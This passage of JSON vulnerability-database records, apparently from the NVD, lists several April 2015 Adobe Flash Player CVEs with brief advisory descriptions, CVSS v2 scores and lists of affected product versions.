"bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3042"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3042", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Double free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0359.\n<a href=\"http://cwe.mitre.org/data/definitions/415.html\">CWE-415: Double Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0346", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0346"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0346", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0346", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in April 2015, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3042.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3043", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3043"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/o:novell:suse_linux_enterprise_desktop:12.0", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/o:novell:suse_linux_enterprise_desktop:11.0", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/o:redhat:enterprise_linux_supplementary:5.0", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:novell:suse_linux_enterprise_workstation_extension:12.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3043", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3043", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:client:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:o:novell:suse_linux_enterprise_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_supplementary:5.0:server:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Use-after-free vulnerability in Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2015-0349, CVE-2015-0358, and CVE-2015-3039.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0351", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0351"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0351", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0351", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:00", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0347, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-0350", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0350"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-0350", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0350", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_workstation_extension:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.264:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_desktop:11.0:sp3:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.451:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:03:03", "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3042, and CVE-2015-3043.", "edition": 5, "cvss3": {}, "published": "2015-04-14T22:59:00", "title": "CVE-2015-3041", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-3041"], "modified": "2018-10-30T16:27:00", "cpe": ["cpe:/a:adobe:flash_player:11.2.202.451", "cpe:/a:adobe:flash_player:13.0.0.264", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/o:opensuse:opensuse:13.1", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/o:suse:suse_linux_enterprise_desktop:12.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.6.z", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/o:suse:suse_linux_enterprise_desktop:11.0", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:redhat:enterprise_linux_workstation_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_server_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/o:redhat:enterprise_linux_server_supplementary:6.0", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:6.0", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:14.0.0.179", "cpe:/o:suse:suse_linux_workstation_extension:12.0", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/o:redhat:enterprise_linux_desktop_supplementary:5.0", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:14.0.0.125"], "id": "CVE-2015-3041", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3041", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*", 